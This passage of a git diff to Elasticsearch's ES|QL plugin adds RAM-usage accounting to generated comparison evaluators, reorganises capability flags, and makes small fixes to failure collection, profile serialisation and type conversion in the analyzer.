100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualLongsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualLongsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class LessThanOrEqualLongsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LessThanOrEqualLongsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualMillisNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualMillisNanosEvaluator.java index 38d84fbd7a6d4..80fff2352a86a 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualMillisNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualMillisNanosEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class LessThanOrEqualMillisNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LessThanOrEqualMillisNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualNanosMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualNanosMillisEvaluator.java index ee46cb74e10ca..7dce2278eca22 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualNanosMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/LessThanOrEqualNanosMillisEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class LessThanOrEqualNanosMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(LessThanOrEqualNanosMillisEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsBoolsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsBoolsEvaluator.java index 1d96506ea34cf..d7e1c44bfb02d 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsBoolsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsBoolsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -22,6 +23,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class NotEqualsBoolsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NotEqualsBoolsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -57,6 +60,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BooleanBlock lhsBlock, BooleanBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsDoublesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsDoublesEvaluator.java index 11e3c7d1021ac..813b27a335c3b 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsDoublesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsDoublesEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class NotEqualsDoublesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NotEqualsDoublesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, DoubleBlock lhsBlock, DoubleBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsGeometriesEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsGeometriesEvaluator.java index d871a0cad6879..97af9037e3bb7 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsGeometriesEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsGeometriesEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class NotEqualsGeometriesEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NotEqualsGeometriesEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock lhsBlock, BytesRefBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef lhsScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsIntsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsIntsEvaluator.java index 15103562050cb..90cc439b8a313 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsIntsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsIntsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class NotEqualsIntsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NotEqualsIntsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, IntBlock lhsBlock, IntBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsKeywordsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsKeywordsEvaluator.java index 5eb75c0bcf604..f93e3ad957578 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsKeywordsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsKeywordsEvaluator.java @@ -8,6 +8,7 @@ import java.lang.Override; import java.lang.String; import org.apache.lucene.util.BytesRef; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -25,6 +26,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class NotEqualsKeywordsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NotEqualsKeywordsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -60,6 +63,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, BytesRefBlock lhsBlock, BytesRefBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { BytesRef lhsScratch = new BytesRef(); diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsLongsEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsLongsEvaluator.java index 0ba697142944f..37f669fcb0e21 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsLongsEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsLongsEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class NotEqualsLongsEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NotEqualsLongsEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsMillisNanosEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsMillisNanosEvaluator.java index 8716cb3fee431..85f35350a39d5 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsMillisNanosEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsMillisNanosEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class NotEqualsMillisNanosEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NotEqualsMillisNanosEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsNanosMillisEvaluator.java b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsNanosMillisEvaluator.java index 15fd009e7046e..ce96ae4fbe14e 100644 --- a/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsNanosMillisEvaluator.java +++ b/x-pack/plugin/esql/src/main/generated/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/NotEqualsNanosMillisEvaluator.java @@ -7,6 +7,7 @@ import java.lang.IllegalArgumentException; import java.lang.Override; import java.lang.String; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BooleanBlock; import org.elasticsearch.compute.data.BooleanVector; @@ -24,6 +25,8 @@ * This class is generated. Edit {@code EvaluatorImplementer} instead. 
*/ public final class NotEqualsNanosMillisEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(NotEqualsNanosMillisEvaluator.class); + private final Source source; private final EvalOperator.ExpressionEvaluator lhs; @@ -59,6 +62,14 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + long baseRamBytesUsed = BASE_RAM_BYTES_USED; + baseRamBytesUsed += lhs.baseRamBytesUsed(); + baseRamBytesUsed += rhs.baseRamBytesUsed(); + return baseRamBytesUsed; + } + public BooleanBlock eval(int positionCount, LongBlock lhsBlock, LongBlock rhsBlock) { try(BooleanBlock.Builder result = driverContext.blockFactory().newBooleanBlockBuilder(positionCount)) { position: for (int p = 0; p < positionCount; p++) { diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/action/EsqlCapabilities.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/action/EsqlCapabilities.java index 9a8b71e8e5eea..b1411723d5080 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/action/EsqlCapabilities.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/action/EsqlCapabilities.java @@ -9,6 +9,7 @@ import org.elasticsearch.Build; import org.elasticsearch.common.util.FeatureFlag; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperator; import org.elasticsearch.features.NodeFeature; import org.elasticsearch.rest.action.admin.cluster.RestNodesCapabilitiesAction; import org.elasticsearch.xpack.esql.core.plugin.EsqlCorePlugin; @@ -889,6 +890,37 @@ public enum Cap { */ AGGREGATE_METRIC_DOUBLE_PARTIAL_SUBMETRICS(AGGREGATE_METRIC_DOUBLE_FEATURE_FLAG), + /** + * Support for rendering aggregate_metric_double type + */ + AGGREGATE_METRIC_DOUBLE_RENDERING(AGGREGATE_METRIC_DOUBLE_FEATURE_FLAG), + + /** + * Support for to_aggregate_metric_double function + */ + AGGREGATE_METRIC_DOUBLE_CONVERT_TO(AGGREGATE_METRIC_DOUBLE_FEATURE_FLAG), + + /** + * Support for sorting when aggregate_metric_doubles are present + */ + AGGREGATE_METRIC_DOUBLE_SORTING(AGGREGATE_METRIC_DOUBLE_FEATURE_FLAG), + + /** + * Support avg with aggregate metric doubles + */ + AGGREGATE_METRIC_DOUBLE_AVG(AGGREGATE_METRIC_DOUBLE_FEATURE_FLAG), + + /** + * Fixes a bug where aggregate metric double is encoded as a single null value but decoded as + * AggregateMetricDoubleBlock (expecting 4 values) in TopN. + */ + AGGREGATE_METRIC_DOUBLE_SORTING_FIXED(AGGREGATE_METRIC_DOUBLE_FEATURE_FLAG), + + /** + * Stop erroring out when trying to apply MV_EXPAND on aggregate metric double. + */ + AGGREGATE_METRIC_DOUBLE_MV_EXPAND(AGGREGATE_METRIC_DOUBLE_FEATURE_FLAG), + /** * Support change point detection "CHANGE_POINT". */ @@ -912,11 +944,6 @@ public enum Cap { */ SUPPORT_PARTIAL_RESULTS, - /** - * Support for rendering aggregate_metric_double type - */ - AGGREGATE_METRIC_DOUBLE_RENDERING(AGGREGATE_METRIC_DOUBLE_FEATURE_FLAG), - /** * Support for RERANK command */ @@ -968,11 +995,6 @@ public enum Cap { */ NON_FULL_TEXT_FUNCTIONS_SCORING, - /** - * Support for to_aggregate_metric_double function - */ - AGGREGATE_METRIC_DOUBLE_CONVERT_TO(AGGREGATE_METRIC_DOUBLE_FEATURE_FLAG), - /** * The {@code _query} API now reports the original types. 
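All of the aggregate_metric_double capabilities above share one constructor argument, a feature flag: a capability is only advertised when its flag is enabled. A reduced sketch of that gating idea (the enum and flag name are illustrative, not the real Cap enum):

import org.elasticsearch.common.util.FeatureFlag;

// Reduced model of capability gating: a flagged constant is advertised only when
// its backing feature flag is enabled (snapshot builds typically enable such flags).
enum MiniCap {
    ALWAYS_ON,
    FLAG_GATED(new FeatureFlag("aggregate_metric_double")); // hypothetical flag name

    private final boolean enabled;

    MiniCap() {
        this.enabled = true;
    }

    MiniCap(FeatureFlag flag) {
        this.enabled = flag.isEnabled();
    }

    boolean isEnabled() {
        return enabled;
    }
}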
*/ @@ -999,11 +1021,6 @@ public enum Cap { */ MAKE_NUMBER_OF_CHANNELS_CONSISTENT_WITH_LAYOUT, - /** - * Support for sorting when aggregate_metric_doubles are present - */ - AGGREGATE_METRIC_DOUBLE_SORTING(AGGREGATE_METRIC_DOUBLE_FEATURE_FLAG), - /** * Supersedes {@link Cap#MAKE_NUMBER_OF_CHANNELS_CONSISTENT_WITH_LAYOUT}. */ @@ -1016,7 +1033,7 @@ public enum Cap { FILTER_IN_CONVERTED_NULL, /** - * When creating constant null blocks in {@link org.elasticsearch.compute.lucene.ValuesSourceReaderOperator}, we also handed off + * When creating constant null blocks in {@link ValuesSourceReaderOperator}, we also handed off * the ownership of that block - but didn't account for the fact that the caller might close it, leading to double releases * in some union type queries. C.f. https://github.com/elastic/elasticsearch/issues/125850 */ @@ -1069,6 +1086,13 @@ public enum Cap { */ DROP_AGAIN_WITH_WILDCARD_AFTER_EVAL, + /** + * Correctly ask for all fields from lookup indices even when there is e.g. a {@code DROP *field} after. + * See + * ES|QL: missing columns for wildcard drop after lookup join #129561 + */ + DROP_WITH_WILDCARD_AFTER_LOOKUP_JOIN, + /** * Support last_over_time aggregation that gets evaluated per time-series */ @@ -1167,6 +1191,11 @@ public enum Cap { */ PARAMETER_FOR_LIMIT, + /** + * Changed and normalized the LIMIT error message. + */ + NORMALIZED_LIMIT_ERROR_MESSAGE, + /** * Dense vector field type support */ @@ -1199,6 +1228,8 @@ public enum Cap { LIKE_WITH_LIST_OF_PATTERNS, + LIKE_LIST_ON_INDEX_FIELDS, + /** * Support parameters for SAMPLE command. */ @@ -1212,10 +1243,31 @@ public enum Cap { */ NO_PLAIN_STRINGS_IN_LITERALS, + /** + * Support for retaining the mv_expand target attribute in its original position. + * See ES|QL: inconsistent column order #129000 + */ + FIX_MV_EXPAND_INCONSISTENT_COLUMN_ORDER, + /** * (Re)Added EXPLAIN command */ - EXPLAIN(Build.current().isSnapshot()); + EXPLAIN(Build.current().isSnapshot()), + /** + * Support improved behavior for LIKE operator when used with index fields. + */ + LIKE_ON_INDEX_FIELDS, + + /** + * Forbid usage of brackets in unquoted index and enrich policy names + * https://github.com/elastic/elasticsearch/issues/130378 + */ + NO_BRACKETS_IN_UNQUOTED_INDEX_NAMES, + + /** + * Support correct counting of skipped shards. 
+ */ + CORRECT_SKIPPED_SHARDS_COUNT; private final boolean enabled; diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/action/EsqlExecutionInfo.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/action/EsqlExecutionInfo.java index 55c36aa1cf353..61d0d3b0e1026 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/action/EsqlExecutionInfo.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/action/EsqlExecutionInfo.java @@ -28,6 +28,7 @@ import org.elasticsearch.xcontent.XContentBuilder; import java.io.IOException; +import java.util.ArrayList; import java.util.Collections; import java.util.EnumMap; import java.util.Iterator; @@ -562,8 +563,14 @@ public Cluster.Builder setFailedShards(int failedShards) { return this; } - public Cluster.Builder setFailures(List failures) { - this.failures = failures; + public Cluster.Builder addFailures(List failures) { + if (failures.isEmpty()) { + return this; + } + if (this.failures == null) { + this.failures = new ArrayList<>(original.failures); + } + this.failures.addAll(failures); return this; } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/action/EsqlQueryResponse.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/action/EsqlQueryResponse.java index 93c30470c316c..4afb1418b2585 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/action/EsqlQueryResponse.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/action/EsqlQueryResponse.java @@ -402,15 +402,17 @@ public static Profile readFrom(StreamInput in) throws IOException { return new Profile( in.readCollectionAsImmutableList(DriverProfile::readFrom), in.getTransportVersion().onOrAfter(TransportVersions.ESQL_PROFILE_INCLUDE_PLAN) - ? in.readCollectionAsImmutableList(PlanProfile::readFrom) - : List.of() + || in.getTransportVersion().isPatchFrom(TransportVersions.ESQL_PROFILE_INCLUDE_PLAN_8_19) + ? 
in.readCollectionAsImmutableList(PlanProfile::readFrom) + : List.of() ); } @Override public void writeTo(StreamOutput out) throws IOException { out.writeCollection(drivers); - if (out.getTransportVersion().onOrAfter(TransportVersions.ESQL_PROFILE_INCLUDE_PLAN)) { + if (out.getTransportVersion().onOrAfter(TransportVersions.ESQL_PROFILE_INCLUDE_PLAN) + || out.getTransportVersion().isPatchFrom(TransportVersions.ESQL_PROFILE_INCLUDE_PLAN_8_19)) { out.writeCollection(plans); } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/analysis/Analyzer.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/analysis/Analyzer.java index f48c95397dcab..1b48ffd22b491 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/analysis/Analyzer.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/analysis/Analyzer.java @@ -134,6 +134,7 @@ import static java.util.Collections.emptyList; import static java.util.Collections.singletonList; import static org.elasticsearch.xpack.core.enrich.EnrichPolicy.GEO_MATCH_TYPE; +import static org.elasticsearch.xpack.esql.action.EsqlCapabilities.Cap.IMPLICIT_CASTING_DATE_AND_DATE_NANOS; import static org.elasticsearch.xpack.esql.core.type.DataType.BOOLEAN; import static org.elasticsearch.xpack.esql.core.type.DataType.DATETIME; import static org.elasticsearch.xpack.esql.core.type.DataType.DATE_NANOS; @@ -175,7 +176,7 @@ public class Analyzer extends ParameterizedRuleExecutor( "Resolution", @@ -1819,10 +1820,6 @@ private static boolean canConvertOriginalTypes(MultiTypeEsField multiTypeEsField private static Expression typeSpecificConvert(ConvertFunction convert, Source source, DataType type, InvalidMappedField mtf) { EsField field = new EsField(mtf.getName(), type, mtf.getProperties(), mtf.isAggregatable()); - return typeSpecificConvert(convert, source, field); - } - - private static Expression typeSpecificConvert(ConvertFunction convert, Source source, EsField field) { FieldAttribute originalFieldAttr = (FieldAttribute) convert.field(); FieldAttribute resolvedAttr = new FieldAttribute( source, @@ -1902,23 +1899,42 @@ private static LogicalPlan planWithoutSyntheticAttributes(LogicalPlan plan) { * Cast the union typed fields in EsRelation to date_nanos if they are mixed date and date_nanos types. 
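The readFrom/writeTo pair above must agree on when plan profiles travel on the wire: either the mainline transport version supports them, or the 8.19 patch backport does. One way to keep the two sides from drifting apart is a shared predicate; a minimal sketch, reusing the version constants from the diff (the helper class itself is made up):

import org.elasticsearch.TransportVersion;
import org.elasticsearch.TransportVersions;

final class PlanProfileWireSupport {
    private PlanProfileWireSupport() {}

    // Both sides of the stream must apply the exact same predicate: a writer that
    // emits the plan profiles must never pair with a reader that skips them.
    static boolean supportsPlanProfiles(TransportVersion version) {
        return version.onOrAfter(TransportVersions.ESQL_PROFILE_INCLUDE_PLAN)
            || version.isPatchFrom(TransportVersions.ESQL_PROFILE_INCLUDE_PLAN_8_19);
    }
}

With such a helper, readFrom would test supportsPlanProfiles(in.getTransportVersion()) and writeTo supportsPlanProfiles(out.getTransportVersion()), so the condition lives in one place.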
